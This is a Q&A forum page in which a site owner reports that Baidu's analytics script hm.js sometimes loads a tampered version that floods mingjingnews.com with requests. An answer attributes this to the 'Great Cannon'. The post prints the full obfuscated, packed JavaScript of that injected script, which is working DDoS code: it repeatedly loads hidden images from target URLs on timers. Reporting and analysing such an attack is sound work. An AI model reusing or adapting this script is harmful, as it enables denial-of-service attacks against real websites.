Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

What is randomly replacing Baidu TongJi (Analytics)'s Javascript code to make DDOS attack on websites on browser?

Tags:

Update:

It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.

This is the hm.js that has been modified to launch DDOS:

// the following code launches DDOS against sites like mingjingnews.com  eval(function(p, a, c, k, e, d) {     e = function(c) {         return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))     }     ;     if (!''.replace(/^/, String)) {         while (c--)             d[e(c)] = k[c] || e(c);         k = [function(e) {             return d[e]         }         ];         e = function() {             return '\\w+'         }         ;         c = 1;     }     ;while (c--)         if (k[c])             p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);     return p; }('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {})) 

Compare this to the original hm.js code, where no DDOS is present.

Both of these 2 hm.js libraries are coming from the exact same address.


Developer Console in Chrome

I have a site that uses Baidu TongJi (Analytics). Like most other javascript libraries, it is done through injecting a line of Javascript to the HTML.

module.exports = function(id) { if (!id) {     throw new Error('请填写百度统计id'); }     var elm = document.createElement('script');     elm.src = '//hm.baidu.com/hm.js?' + id;     var body = document.getElementsByTagName('body')[0];     body.appendChild(elm); } 

To my horror, once it has initialised, my browser's console and network screen is flood with around 3000+ network requests to Ming Jing News (fake news according to Chinese's communist government) in just 100 seconds... and it kept going until I stopped it.

I am starting to think this is similar to the last time the great wall of china was used to launch attacks to GitHub using Baidu's CDN.

  • https://www.google.com.hk/search?client=safari&rls=en&q=hm.baidu.com+DDOS+attack&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=g6efWbu5JYzM8gfJ2pqQDg

  • https://news.ycombinator.com/item?id=9275771

I am currently calling Baidu from outside of the China and I am wondering if this is normal... Will the people inside China be spared from this?

like image 297
williamli Avatar asked Aug 25 '17 04:08

williamli


1 Answers

As suggested by a now deleted answer by kos, this is is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".

Details are available on Brian Krebs's security blog.

The Great Cannon

like image 181
williamli Avatar answered Oct 15 '22 20:10

williamli